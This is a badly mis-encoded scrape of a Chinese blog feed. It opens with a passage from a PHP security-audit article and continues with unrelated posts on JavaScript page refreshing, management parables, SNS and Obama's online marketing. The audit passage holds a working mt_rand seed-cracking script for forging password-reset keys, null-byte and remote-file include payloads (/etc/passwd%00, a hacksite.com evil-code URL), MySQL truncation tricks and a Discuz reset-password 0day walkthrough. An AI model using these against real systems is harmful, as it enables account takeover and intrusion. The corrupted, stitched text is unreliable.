�W�二�U�：5.2.6>php>4.2.0默认播种的算法也不是很强悍，�q�是Stefan Esser的文章里的描�q�ͼ�

-------------------------------------------------------------------------------
The Implementation
When mt_rand() is seeded internally or by a call to mt_srand() PHP 4 and PHP 5
<= 5.2.0 force the lowest bit to 1. Therefore the strength of the seed is only
31 and not 32 bits. In PHP 5.2.1 and above the implementation of the Mersenne
Twister was changed and the forced bit removed.
-------------------------------------------------------------------------------

�?2位系�l�上默认的播�U�的�U�子为最大值是2^32�Q�这��h��们��@环最�?^32�ơ就可以破解
seed。而在PHP 4和PHP 5 <= 5.2.0 的算法有个bug�Q�奇数和偶数的播�U�是一��L��Q�详见附�?br /> [3]�Q?��试代码如下�Q?/p>

--code-------------------------------------------------------------------------
mt_srand(4);
$a = mt_rand();
mt_srand(5);
$b = mt_rand();
print $a."\n".$b;
?>
-------------------------------------------------------------------------------

通过上面的代码发�?a==$b�Q�所以我们��@环的�ơ数�?^32/2=2^31�ơ。我们看如下代码�Q?/p>

--code-------------------------------------------------------------------------
//base on http://www.milw0rm.com/exploits/6421
//test on php 5.2.0

define('BUGGY', 1); //上面代码$a==$b时候定义BUGGY=1

$key = wp_generate_password(20, false);
echo $key."\n";
$seed = getseed($key);
print $seed."\n";

mt_srand($seed);
$pass = wp_generate_password(20, false);
echo $pass."\n";

function wp_generate_password($length = 12, $special_chars = true) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
if ( $special_chars )
$chars .= '!@#$%^&*()';

$password = '';
for ( $i = 0; $i < $length; $i++ )
$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
return $password;
}

function getseed($resetkey) {
$max = pow(2,(32-BUGGY));
for($x=0;$x<=$max;$x++) {
$seed = BUGGY ? ($x << 1) + 1 : $x;
mt_srand($seed);
$testkey = wp_generate_password(20,false);
if($testkey==$resetkey) { echo "o\n"; return $seed; }

if(!($x % 10000)) echo $x / 10000;
}
echo "\n";
return false;
}
?>
-------------------------------------------------------------------------------

�q�行�l�果如下�Q?/p>

-------------------------------------------------------------------------------
php5>php rand.php
M8pzpjwCrvVt3oobAaOr
0123456789101112131415161718192021222324252627282930313233343536373839404142434
445464748495051525354555657585960616263646566676869
7071727374757677787980818283848586878889909192939495969798991001011021031041051
061071081091101111121131141151161171181191201211221
2312412512612712812913013113213313413513613713813914014114214314414514614714814
915015115215315415515615715815916016116216316416516
6167168169170171172173174175176177178179180181182183184185186187188189190191192
193194195196197198199200201202203204205206207208209
2102112122132142152162172182192202212222232242252262272282292302312322332342352
362372382392402412422432442452462472482492502512522
..............01062110622106231062410625106261062710628106291063010631106321063
3o
70693
pjwCrvVt3oobAaOr
-------------------------------------------------------------------------------

�?0634�ơ时候我们得��C��l�果�?/p>

当PHP版本��C��5.2.1后，通过修改��法修补了奇数和偶数的播�U�相�{�的问题�Q�这样也��D��
了php5.2.0前后��D��同一个播�U�后的mt_rand()的��g��一栗��比如：

--code-------------------------------------------------------------------------
mt_srand(42);
echo mt_rand();
//php<=5.20 1387371436
//php>5.20 1354439493
?>
-------------------------------------------------------------------------------

正是�q�个原因�Q�也要求了我们的exp的运行环境：当目�?gt;5.20时候，我们exp�q�行的环境也
要是>5.20的版本，反过来也是一栗��?/p>

从上面的��试及分析来看，php<5.26不管有没有定义播�U�，mt_rand处理的数据都是不�?br /> 全的。在web应用里很多都使用mt_rand来处理随机的session�Q�比如密码找回功能等�{�，�q�样
的后果就是被��d��者恶意利用直接修改密码�?/p>

很多著名的程序都产生了类似的漏洞如wordpress、phpbb、punbb�{�等。（在后面我们将
实际分析下国内著名的bbs�E�序Discuz!的mt_srand��D��的漏�z�）

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�php4 php5<5.2.6
�pȝ��要求�Q�无
审计�{�略�Q�查找mt_srand/mt_rand
+++++++++++++++++++++++++

5.6 �Ҏ��字符

其实“�Ҏ��字符”也没有特定的标准定义�Q�主要是在一些code hacking发挥着�Ҏ��重作�?br /> 的一�c�d��W�。下面就丑և�个例子：

5.6.1 截断

其中最有名的数大家都熟悉的null字符截断�?/p>

5.6.1.1 include截断

--code-------------------------------------------------------------------------
include $_GET['action'].".php";
?>
-------------------------------------------------------------------------------

提交“action=/etc/passwd%00”中的“%00”��截断后面的“.php”�Q�但是除�?#8220;%00”�q�有没有
其他的字�W�可以实现截断��用呢�Q�肯定有人想��C��q�程包含的url里问�?#8220;?”的作用，通过提交
“action=http://www.hacksite.com/evil-code.txt?”�q�里“?”实现�?#8220;伪截�?#8221;�Q�）�Q�好象这�?br /> 看上��M��是那么舒服那么我们简单写个代码fuzz一下：

--code-------------------------------------------------------------------------
////////////////////
////var5.php代码:
////include $_GET['action'].".php";
////print strlen(realpath("./"))+strlen($_GET['action']);
///////////////////
ini_set('max_execution_time', 0);
$str='';
for($i=0;$i<50000;$i++)
{
$str=$str."/";

$resp=file_get_contents('http://127.0.0.1/var/var5.php?action=1.txt'.$str);
//1.txt里的代码为print 'hi';
if (strpos($resp, 'hi') !== false){
print $i;
exit;
}
}
?>
-------------------------------------------------------------------------------

�l�过��试字符“.”�?#8220; /”或�?个字�W�的�l�合�Q�在一定的长度时将被截断，win�pȝ��?nix
的系�l�长度不一��P��当win下strlen(realpath("./"))+strlen($_GET['action'])的长度大�?br /> 256时被截断�Q�对�?nix的长度是4 * 1024 = 4096。对于php.ini里设�|�远�E�文件关闭的时�?br /> ��可以利用上面的技巧包含本地文件了。（此漏�z�由cloie#ph4nt0m.org最先发现]�Q?/p>

5.6.1.2 数据截断

    对于很多web应用文�g在很多功能是不容讔R��复数据的�Q�比如用��h��册功能等。一般的�?br /> 用程序对于提交注册的username和数据库里已有的username�Ҏ��是不是已�l�有重复数据�Q�然
而我们可以通过“数据截断”�{�来饶过�q�些判断�Q�数据库在处理时候��生截断导致插入重复数
据�?br />
1) Mysql SQL Column Truncation Vulnerabilities

    �q�个漏洞又是大牛Stefan Esser发现的（Stefan Esser是我的偶�?)�Q�，�q�个是由于mysql
的sql_mode讄��为default的时候，��x��有开启STRICT_ALL_TABLES选项�Ӟ��MySQL对于插入��?br /> 长的值只会提�C�warning�Q�而不是error�Q�如果是error��插入不成功�Q�，�q�样可能会导致一些截
断问题。测试如下：

--code-------------------------------------------------------------------------
mysql> insert into truncated_test(`username`,`password`) values("admin","pass");

mysql> insert into truncated_test(`username`,`password`) values("admin x", "new_pass");
Query OK, 1 row affected, 1 warning (0.01 sec)

2) Mysql charset Truncation vulnerability

    �q�个漏洞�?0sec发现的，当mysql�q�行数据存储处理utf8�{�数据时�Ҏ��些字�W�导致数�?br /> 截断。测试如下：

--code-------------------------------------------------------------------------
mysql> insert into truncated_test(`username`,`password`) values(concat("admin",0xc1), "new_pass2");
Query OK, 1 row affected, 1 warning (0.00 sec)

--code-------------------------------------------------------------------------
$result = mysql_query("SELECT * from test_user where user='$user' ");
....
if(@mysql_fetch_array($result, MYSQL_NUM)) {
die("already exist");
}
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

5.6.1.3 文�g操作里的�Ҏ��字符

    文�g操作里有很多�Ҏ��的字�W�，发挥特别的作用，很多web应用�E�序没有注意处理�q�些�?br /> �W�而导致安全问题。比如很多�h都知道的windows�pȝ��文�g名对“�I�格”�?#8220;.”�{�的忽视�Q�这�?br /> 主要体现在上传文件或者写文�g上，��D��直接写webshell。另外对于windows�pȝ��?#8220;.\..\”
�q�行�pȝ��转蟩�{�等�?br />
    下面�q�给大家介绍一个非常有意思的问题�Q?/p>

--code-------------------------------------------------------------------------
//Is this code vul?
if( eregi(".php",$url) ){
die("ERR");
}
$fileurl=str_replace($webdb[www_url],"",$url);
.....
header('Content-Disposition: attachment; filename='.$filename);
-------------------------------------------------------------------------------

很多人看出来了上面的代码的问题，�E�序首先��止使用“.php”后缀。但是下面居然接�?br /> 个str_replace替换$webdb[www_url]为空�Q�那么我们提�?#8220;.p$webdb[www_url]hp”��可以饶�q?br /> 了。那么上面的代码杂fix呢？有�h�l�出了如下代码：

--code-------------------------------------------------------------------------
$fileurl=str_replace($webdb[www_url],"",$url);
if( eregi(".php",$url) ){
die("ERR");
}
-------------------------------------------------------------------------------

str_replace提到前面了，很完��的解决了str_replace代码的安全问题，但是问题不是�?br /> 么简单，上面的代码在某些�pȝ��上一样可以突破。接下来我们先看看下面的代码�Q?/p>

--code-------------------------------------------------------------------------
for($i=0;$i<255;$i++) {
$url = '1.ph'.chr($i);
$tmp = @file_get_contents($url);
if(!empty($tmp)) echo chr($i)."\r\n";
}
?>
-------------------------------------------------------------------------------

我们在windows�pȝ��q�行上面的代码得到如下字�W? < > ? P p都可以打开目录下的1.php�?/p>

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�文��d��件操作函�?br /> +++++++++++++++++++++++++

六、怎么�q�一步寻找新的字�?/p>

上面我们列�D很多的字典，但是很多都是已经公开�q�的漏洞或者方式，那么我们怎么�q�一
步找到新的字典或者利用方式呢�Q?/p>

    * 分析和学习别人发现的漏洞或者exp�Q��ȝ��出漏�z�类型及字典�?br />
    * 通过学习php手册或者官�Ҏ��?挖掘出新的有危害的函数或者利用方式�?br />
    * fuzz php的函敎ͼ�扑ֈ�新的有问题的函数�Q�不一定非要溢出的�Q�，如上一章的4.6的部�?br /> 很多都可以简单的fuzz脚本可以��试出来�?br />
    * 分析php源代码，发现新的漏洞函数“�Ҏ�?#8221;或者漏�z�。（在上一节里介绍的那�?#8220;漏洞�?br /> 计策�?#8221;里，都没有php源代码的分析�Q�如果你要进一步找到新的字典，可以在php源代码的基础
上分析下成因�Q�然后根据这个成因来分析��L��新的漏洞函数“�Ҏ�?#8221;或者漏�z�。）�Q�我们以后会
陆箋公布一些我们对php源代码的分析�Q?br />
    * 有条件或者机会和开发者学习，扑ֈ�他们实现某些常用功能的代码的�~�陷或者容易忽
视的问题

    * 你有什么要补充的吗�Q?�Q�）

七、DEMO

* DEMO -- Discuz! Reset User Password 0day Vulnerability 分析
�Q�Exp:http://www.80vul.com/dzvul/sodb/14/sodb-2008-14.txt�Q?/p>

PHP版本要求:php4 php5<5.2.6
�pȝ��要求: �?br /> 审计�{�略:查找mt_srand/mt_rand

�W�一�?安装Discuz! 6.1后利用grep查找mt_srand得到�Q?/p>

-------------------------------------------------------------------------------
heige@heige-desktop:~/dz6/upload$ grep -in 'mt_srand' -r ./ --colour -5
./include/global.func.php-694- $GLOBALS['rewritecompatible'] && $name = rawurlencode($name);
./include/global.func.php-695- return '';
./include/global.func.php-696-}
./include/global.func.php-697-
./include/global.func.php-698-function random($length, $numeric = 0) {
./include/global.func.php:699: PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);
./include/global.func.php-700- if($numeric) {
./include/global.func.php-701-          $hash = sprintf('%0'.$length.'d', mt_rand(0, pow(10, $length) - 1));
./include/global.func.php-702- } else {
./include/global.func.php-703-          $hash = '';
./include/global.func.php-704-          $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
--
./include/discuzcode.func.php-30-
./include/discuzcode.func.php-31-if(!isset($_DCACHE['bbcodes']) || !is_array($_DCACHE['bbcodes']) || !is_array($_DCACHE['smilies'])) {
./include/discuzcode.func.php-32-       @include DISCUZ_ROOT.'./forumdata/cache/cache_bbcodes.php';
./include/discuzcode.func.php-33-}
./include/discuzcode.func.php-34-
./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
./include/discuzcode.func.php-36-
./include/discuzcode.func.php-37-function attachtag($pid, $aid, &$postlist) {
./include/discuzcode.func.php-38-       global $attachrefcheck, $thumbstatus, $extcredits, $creditstrans, $ftp, $exthtml;
./include/discuzcode.func.php-39-       $attach = $postlist[$pid]['attachments'][$aid];
./include/discuzcode.func.php-40-       if($attach['attachimg']) {
-------------------------------------------------------------------------------

有两个文件用��C��mt_srand()�Q�第1是在./include/global.func.php的随机函数random()里：

--code-------------------------------------------------------------------------
PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);
-------------------------------------------------------------------------------

判断了版本，如果是PHP_VERSION > '4.2.0'使用php本��n默认的播�U�。从上一章里的分
析我们可以看得出来，使用php本��n默认的播�U�的分程序两�U�情况：

1) 'Cross Application Attacks' �q�个思�\是只要目标上有��用��用的�E�序里定义了�c�M��
mt_srand((double)microtime() * 1000000)的播�U�的话，又很有可能被暴力。在dz�q�里不需
要Cross Application�Q�因��Z��本��n有文件就定义了，��是上面的第2个文�Ӟ��

--code-------------------------------------------------------------------------
./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
-------------------------------------------------------------------------------

�q�里我们肯定dz是存在这个漏�z�的�Q�文章给出来的exp也就是基于这个的。（具体exp利用
的流�E�有兴趣的可以自己分析下]�Q?/p>

2) 有的��为如果没有mt_srand((double)microtime() * 1000000);�q�里的定义，那么dz��?br /> 不存在漏�z�，�q�个是不正确的。首先你不可以保证别��Z��用的其他应用�E�序没有定义�Q�再�ơ不
利用'Cross Application Attacks'�Q?.2.6>php>4.2.0 php本��n默认播种的算法也不是很强
悍（分析详见上）�Q�也是有可以暴力出来�Q�只是速度要慢一炏V�?/p>

八、后�?/p>

本文�?0vul的三大马�Ԍ��80vul-A�Q?0vul-B�Q?0vul-C集体智慧的结�Ӟ��其�?0vul-B�?br /> 献了不少新发现。另外需要感谢的是文章里提到的那些漏�z�的发现者，没有他们的成果也��?br /> 没有本文。本文没有写“参�?#8221;�Q�因为本文是一个�ȝ��性的文挡�Q�有太多的连接需要提供限于篇
�q�就没有一一列�D�Q�有心的读者可以自行google。另外原本没有打��公布此文，因�ؓ里面包含
了太多应用程序的0day�Q�而且有太多的不尊重别人成果的人，老是利用从别人那学到的技术来
炫耀�Q�甚至牟取利益。在�q�里我们希望你可以在本文里学��C��东西�Q�更加希望如果通过本文�?br /> 扑ֈ�了某些应用程序的0day�Q�请低调处理�Q�或者直接提交给官方修补�Q�谢谢大�Ӟ��Q?/p>

九、附�?/p>

[1] http://bbs.phpchina.com/attachment.php?aid=22294
[2] http://www.php-security.org/
[3] http://bugs.php.net/bug.php?id=40114

肖马�?/a> 2010-06-28 18:14 发表评论

js��h��大全

Fri, 04 Jun 2010 02:38:00 GMT

一、先来看一个简单的例子�Q?br />         下面以三个页面分别命名�ؓframe.html�?strong>top.html�?strong>bottom.html��Z��来具体说明如何做�?nbsp;

        frame.html �׃��(top.html)�?bottom.html)两个��面�l�成�Q�代码如下：

1DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
2<HTML>
3<HEAD>
4<TITLE> frame TITLE>
5HEAD>
6<frameset rows="50%,50%">
7 <frame name=top src="top.html">
8 <frame name=bottom src="bottom.html">
9frameset>
10HTML>

现在假设top.html (即上面的��面) 有七个button来实现对bottom.html (即下面的��面) 的刷斎ͼ�可以用以下七�U�语句，哪个好用自己看着办了�?nbsp;

1top.html ��面的代码如下：
2
3DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
4<HTML>
5<HEAD>
6<TITLE> top.html TITLE>
7HEAD>
8<BODY>
9  <input type=button value="��h��1" onclick="window.parent.frames[1].location.reload()"><br>
10  <input type=button value="��h��2" onclick="window.parent.frames.bottom.location.reload()"><br>
11  <input type=button value="��h��3" onclick="window.parent.frames['bottom'].location.reload()"><br>
12  <input type=button value="��h��4" onclick="window.parent.frames.item(1).location.reload()"><br>
13  <input type=button value="��h��5" onclick="window.parent.frames.item('bottom').location.reload()"><br>
14  <input type=button value="��h��6" onclick="window.parent.bottom.location.reload()"><br>
15  <input type=button value="��h��7" onclick="window.parent['bottom'].location.reload()"><br>
16BODY>
17HTML>
18

下面是bottom.html��面源代码，��Z��证明下方��面的确被刷��C��Q�在装蝲完页面弹��Z��个对话框�?nbsp;

1
2DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
3<HTML>
4<HEAD>
5<TITLE> bottom.html TITLE>
6HEAD>
7<BODY onload="alert('我被加蝲了！')">
8 <h1>This is the content in bottom.html.h1>
9BODY>
10HTML>

解释一下：

1.window指代的是当前��面�Q�例如对于此例它指的是top.html��面�?nbsp;
2.parent指的是当前页面的爉��面，也就是包含它的框枉��面。例如对于此例它指的是framedemo.html�?nbsp;
3.frames是window对象�Q�是一个数�l�。代表着该框架内所有子��面�?nbsp;
4.item是方法。返回数�l�里面的元素�?nbsp;
5.如果子页面也是个框架��面�Q�里面还是其它的子页面，那么上面的有些方法可能不行�?nbsp;

附：

Javascript��h��面的几�U�方法：
1 history.go(0)
2 location.reload()
3 location=location
4 location.assign(location)
5 document.execCommand('Refresh')
6 window.navigate(location)
7 location.replace(location)
8 document.URL=location.href

二、自动刷新页�?br /> 1.��面自动��h��Q�把如下代码加入区域�?nbsp;

2.��面自动跌��{�Q�把如下代码加入区域�?br />

3.��面自动��h��js�?

三、java在写Servler,Action�{�程序时�Q�要操作�q�回��面的话�Q�如谈出了窗口，操作完成以后�Q�关闭当前页面，��h��爉��面）

1        PrintWriter out = response.getWriter();
2        out.write(""text/javascript\">");
3         ////子窗口刷新父�H�口
4         out.write("self.opener.location.reload();");
5         //关闭�H�口
6         out.write("window.opener=null;");
7         out.write("window.close();");
8         out.write("");

四、JS��h��框架的脚本语�?
1.如何��h��包含该框架的��面�?

2.子窗口刷新父�H�口

3.如何��h��另一个框架的��面�?�Q�上面的实例以说明了�Q?br />

语句1. window.parent.frames[1].location.reload();
语句2. window.parent.frames.bottom.location.reload();
语句3. window.parent.frames["bottom"].location.reload();
语句4. window.parent.frames.item(1).location.reload();
语句5. window.parent.frames.item('bottom').location.reload();
语句6. window.parent.bottom.location.reload();
语句7. window.parent['bottom'].location.reload();

4.如果惛_��闭窗口时��h��或者想开�H�时��h��的话�Q�在中调用以下语句即可�?nbsp;

<body onload="opener.location.reload()"> 开�H�时��h��
<body onUnload="opener.location.reload()"> 关闭时刷�?nbsp;
<script language="javascript">
window.opener.document.location.reload()
script>

肖马�?/a> 2010-06-04 10:38 发表评论

Sun, 30 May 2010 09:18:00 GMT

链接�q�回上一��：
�q�回上一��?lt;/a>
�?
�q�回上一��?lt;/a>

按钮�q�回上一��：
肖马�?/a> 2010-05-30 17:18 发表评论

用禅宗理解开发境�?

Tue, 29 Dec 2009 02:51:00 GMT

参禅之初�Q�看山是�?看水是水
初学�E�序开发时认�ؓ�Q�C �?C、VB �?VB 都是要一个一个学的�?br />
��有悟时�Q�看�׃��是山看水不是�?/strong>
�{�到渐渐地把开发语�a��q�用�U�熟了，可以触类旁通，发现以前学过的那些语�a�和将要新学的�Q��L��q�样那样的相通、相�q�、相��g��处。�Q何一门语�a��Q�都能快速上手。在意识里语�a�已没有差别，无非是语法与关键字的区别而已�Q�语�a�已经不重要了�?br />
��中��L��Q�看�׃��然是�?看水仍然是水
�q�了很长旉��才发玎ͼ�那时自己�q�没有到达最高境界，才醒悟到以前所谓的掌握多种语言�Q�其实还是只掌握了一门语�a��Q�就像《天龙八部》里的鸠摩智�Q�以��无相神功，耍那��林七十二绝技�Q�其实却都不�q�是一套本事�Ş了。而且更�ؓ重要的是更加意识到要真正用好一门语�a��Q�发挥一门语�a�的长处，理解�q�门语言的思想内涵�Q�实现细节是非常关键的。而实现细节是各个语言自��n的特�Ԍ��到头来还是把不同的语�a��Q�当成不同的语言来��用�?/div>

肖马�?/a> 2009-12-29 10:51 发表评论

Tue, 29 Dec 2009 02:51:00 GMT

袋鼠与笼�?/strong>
      有一天动物园��理员们发现袋鼠从笼子里跑出来了�Q�于是开会讨论，一致认为是�W�子的高度过低。所以它们决定将�W�子的高度由原来的十公尺加高��C��十公��。结果第二天他们发现袋鼠�q�是跑到外面来，所以他们又军_��再将高度加高��C��十公��?br />       没想到隔天居然又看到袋鼠全跑到外面，于是��理员们大�ؓ紧张�Q�决定一不做二不休，��笼子的高度加高��C��癑օ��?br />       一天长颈鹿和几只袋鼠们在闲聊，“你们看，�q�些��Z��不会再��l�加高你们的�W�子�Q?#8221;镉K��鹉K��?br />       “很难说�?#8221;袋鼠说∶“如果他们再��l�忘记关门的话！”
      点评�Q�事�?#8220;本末”�?#8220;轻重”�?#8220;�~��?#8221;�Q�关门是本，加高�W�子是末�Q�舍本而逐末�Q�当然就不得要领了。管理是什么？��理是抓事情�?#8220;本末”�?#8220;轻重”�?#8220;�~��?#8221;�?/font>

扁鹊的医�?/strong>
      ��文王问名医扁鹊说∶“你们家兄弟三人，都精于医术，到底哪一位最好呢�Q?#8221;
      扁鹊�{�说�?#8220;长兄最好，中兄�ơ之�Q�我最差�?#8221;
      文王再问�?#8220;那么��Z��么你最出名呢？”
      扁鹊�{�说�?#8220;我长兄治病，是治病于病情发作之前。由于一般�h不知道他事先能铲除病因，所以他的名气无法传出去�Q�只有我们家的�h才知道。我中兄�ȝ��Q�是�ȝ��于病情初起之时。一般�h以�ؓ他只能治��d��的小病，所以他的名气只及于本乡里。而我扁鹊�ȝ��Q�是�ȝ��于病情严重之时。一般�h都看到我在经脉上�I�K��来放血、在皮肤上敷药等大手术，所以以为我的医术高明，名气因此响遍全国�?#8221;
      文王说∶“你说得好极了�?#8221;
      点评�Q�事后控制不如事中控�Ӟ��事中控制不如事前控制�Q�可惜大多数的事业经营者均未能体会到这一点，�{�到错误的决�{�造成了重大的损失才寻求��I补，有时是亡��补牢，为时已晚�?/font>

曲突徒薪
      有位客�h到某人家里作客，看见��M�h家的灶上烟囱是直的，旁边又有很多木材�?nbsp;
      客�h告诉��M�h��_��烟囱要改�Ԍ��木材��ȝ��去，否则��来可能会有火灾�Q�主人听了没有做��M��表示�?nbsp;
      不久��M�h安��果然��q��Q�四周的��d��赶紧跑来救火�Q�最后火被扑灭了�Q�于是主人烹��宰牛，宴请四邻�Q�以酬谢他们救火的功劻I��但是�q�没有请当初��他将木材�U�走�Q�烟囱改曲的人�?nbsp;
      有�h对主��?#8220;如果当初听了那位先生的话�Q�今天也不用准备�{�席�Q�而且没有火灾的损失，现在论功行赏�Q�原先给你徏议的人没有被感恩�Q�而救火的人却是��上客�Q�真是很奇怪的事呢�Q?#8221;
      ��M�h��时省悟�Q�赶紧去邀请当初给予徏议的那个客�h来吃酒�?nbsp;
      点评�Q�一般�h认�ؓ�Q��以摆�q�x��解决企业�l�营�q�程中的各种��手问题的�h�Q�就是优�U�的管理者，其实�q�是有待商榷的，俗话说∶“预防重于�ȝ��”�Q�能防患于未然之前，更胜于治�׃��已成之后�Q�由此观之，企业问题的预防者，其实是优于企业问题的解决者�?/font>

�U�才买�?/strong>
      有一个秀才去卖材�Q�他对卖材的��?#8220;药��者过来！”卖材的�h听不�?#8220;药��?#8221;�Q�担材的人）三个字，但是听得�?#8220;�q�来”两个字，于是把材担到�U�才前面�?nbsp;
      �U�才问他∶“其�h如何�Q?#8221;卖材的�h听不太懂�q�句话，但是听得�?#8220;�?#8221;�q�个字，于是��告诉秀才�h钱�?nbsp;
      �U�才接着说∶“外实而内虚，烟多而焰��，��h��之。（你的木材外表是干的，里头却是湿的�Q�燃烧�v来，会浓烟多而火焰小�Q�请减些价钱吧。）”卖材的�h因�ؓ听不懂秀才的话，于是担着材就��C��?nbsp;
      点评�Q�管理者��^时最好用��单的语言、易懂的�a�词来传达讯息�Q�而且对于说话的对象、时��有所掌握�Q�有时过分的修饰反而达不到惌��完成的目的�?/font>

肖马�?/a> 2009-12-29 10:51 发表评论

什么是SNS

Tue, 29 Dec 2009 02:50:00 GMT

一句话说SNS�Q�通过�|�络�q�行�C�会交往的系�l��?br />
两句话说SNS�Q�通过�|�络�q�行�C�会交往的系�l�。系�l�中可以衍生出多��Ҏ��利于联络人的应用�?br />
三句话说SNS�Q�通过�|�络�q�行�C�会交往的系�l�。系�l�中可以衍生出多��Ҏ��利于联络人的应用。这些应用可一对多也可以一对一�?br />
四句话说SNS�Q�通过�|�络�q�行�C�会交往的系�l�。系�l�中可以衍生出多��Ҏ��利于联络人的应用。这些应用可一对多也可以一对一。用户在其中收获的仅仅是联系而非传统的信息�?br />
五句话说SNS�Q�通过�|�络�q�行�C�会交往的系�l�。系�l�中可以衍生出多��Ҏ��利于联络人的应用。这些应用可一对多也可以一对一。用户在其中收获的仅仅是联系而非传统的信息。这些联�p�d��以往的网�l�中实际已经存在且已成信息化关系�?br />
六句话说SNS�Q�通过�|�络�q�行�C�会交往的系�l�。系�l�中可以衍生出多��Ҏ��利于联络人的应用。这些应用可一对多也可以一对一。用户在其中收获的仅仅是联系而非传统的信息。这些联�p�d��以往的网�l�中实际已经存在且已成信息化关系。信息化关系可通过��面和操作呈现出来�?br />
七句话说SNS�Q�通过�|�络�q�行�C�会交往的系�l�。系�l�中可以衍生出多��Ҏ��利于联络人的应用。这些应用可一对多也可以一对一。用户在其中收获的仅仅是联系而非传统的信息。这些联�p�d��以往的网�l�中实际已经存在且已成信息化关系。信息化关系可通过��面和操作呈现出来。这�U�页面多呈现从Web1.0到Web2.0的进步�?/div>

肖马�?/a> 2009-12-29 10:50 发表评论

Fri, 20 Nov 2009 05:55:00 GMT
在一�q�前的世界经��论坛上�Q�比��?#183;盖茨��N��a�五年内互联网��?#8220;颠覆”电视的地位。而Google公司CEO埃里克则在两�q�前预言�Q?#8220;能够发挥互联�|�全部潜力的候选�h�Q�将会在下一�ơ�ȝ��大选中脱颖而出�?#8221;
　　没想��C��位IT巨匠的话都被应验了。名不见�l�传的黑��拉克·侯赛�?#183;奥巴马斜刺里杀出，一路过��x��，成功晋�񔾟�国�ȝ��竞选的“册��”�?/p>
　　政治观察家们一致认为，奥巴马得以击败希拉里�Q?#8220;�|�络营销”立下了汗马功劻I��他也因此被称�?#8220;Web2.0时代的营销大师”。奥巴马是如何将原本默默无闻�?#8220;个�h品牌”做成一�?#8220;世界知名品牌”的？

　　带着�q�个疑问反观中国�Q�中国互联网�l�信息中心（CNNIC�Q�发布的《第22�ơ中国互联网�l�发展状�늻�计报告》显�C�：截至2008�q?月底�Q�我�?�|�民数量辑ֈ��?.53亿，首次大幅度超�q�美国，�|�民规模跃居世界�W�一位。如何调动全球最多的�|�民的神�l�，成�ؓ所有企业网�l�营销�{�划旉��临的�W�一道课题。奥巴马会给我们怎样的启�C�？在Web2.0时代企业如何做品牌，如何通过�|�络营销�{�划推广自己的��品？

　　�?#8220;花样游泳”勑ּ�观众

　　“我等不及2008�q�大选，宝贝�Q�你是最好的候选�h�Q�你采取了边境安全措施，打破你我之间的界限。全民医疗保险，嗯，�q��我感到温�?#8230;…”

　　�q�是视频�|�站Youtube上《奥巴马令我��魂颠倒》的一�D�|��词。在视频中，�w�着比基��的演唱者埃��h��搔首弄姿�Q�在奥巴马照片旁大摆性感热��G造型�Q�毫不掩饰地表达着自己对奥巴马的倾慕之情。据�l�计�Q�这�D�视频在Youtube已被点击��过900万次�Q��ƈ且被无数的网站和传统媒体转蝲�?/p>
　　一个不容争辩事实的是，�|�络营销�{�划成了本次��国大选媄响民意的重要手段�Q�那些数�q�前�q�不存在的传播渠道如博客、Myspace�C�֌�、Youtube视频�Q�显�C�出巨大影响力，��p��肯尼�q�、尼克松引以��的电视辩论都相�Ş见绌�?/p>
　　�q�不由想起在刚刚�l�束的北京奥�q�会上，花样游泳、沙滩排球吸引了不少中国��看。在饱受几千�q�封建思想�z�礼的中国，�q�两��运动终于让普通老百姓大开眼界一睹其真面目。�ؓ什么受�Ƣ迎�Q�因为其�_��l�仑的动作能让�h��D��~��ؕ�Q�甚至��?#8220;意�ؕ情迷”的��惟�?/p>
　　�|�络营销�{�划是什么？�|�络营销��是能让人目不暇接、能让�h��连忘返、能让�h意�ؕ情迷、能让�h改变初衷的在�U�营销与品牌推�qѝ�?/p>
　　奥巴马击败希拉里�Q�招招不��M��联网可以看出�|�络营销�{�划无处不在。奥巴马寚w��凯恩出招�Q�又是招招不��M��联网。电子邮件、手机短信、视频网站，不一而��。在奥巴马的竞选网站上�Q�可以直接点击观看奥巴马视频�Q�在�U�购买奥巴马标记的��品，下蝲奥巴马的演讲作�ؓ手机铃声。奥巴马玩�{�|�络营销�{�划�Q�像表演“花样游泳”一��L��引着�|�民手中�?鼠标�?/p>
　　�|�络营销�{�划不是几个弹出的广告，不是“BBS炒作”�Q�而是一�p�d��|�络推广手段的整合。网�l�营销�{�划是组合拳�Q�是花样游泳�Q�得有一双双修长的美�ѝ��一套漂亮的动作�?#8220;勑ּ�”观众�?/p>
　　�l�合投资可以分散风险�Q�就要注�?#8220;二八原则”�Q�但同时也不能忽�?#8220;长尾效应”�?/p>
　　搜烦引擎、BBS、视频、电子杂志就是发挥着“�?#8221;作用�?#8220;�?#8221;�Q�但是还有更多的“长尾”不容忽视�Q�如博客、SNS、百度脓吧等�?/p>
　　搜烦引擎一度在�|�络营销�{�划中发挥了显赫作用�Q�而随着竞�h排名的透明化，用户也开始擦亮眼睛。相比之下网�l�BBS营销则更加隐蔽而不至于让�h生厌�Q�今�q�有“两个一亿元”不得不提。王老吉亿元捐款“遭封杀”是比较成功的BBS营销案例�Q�而盘古大观编�?#8220;盖茨亿元�U�楼看奥�q?#8221;的假新闻在各大论坛进行炒作，虽然知名度上��M��Q�但是美誉度却堪比脑白金�?/p>
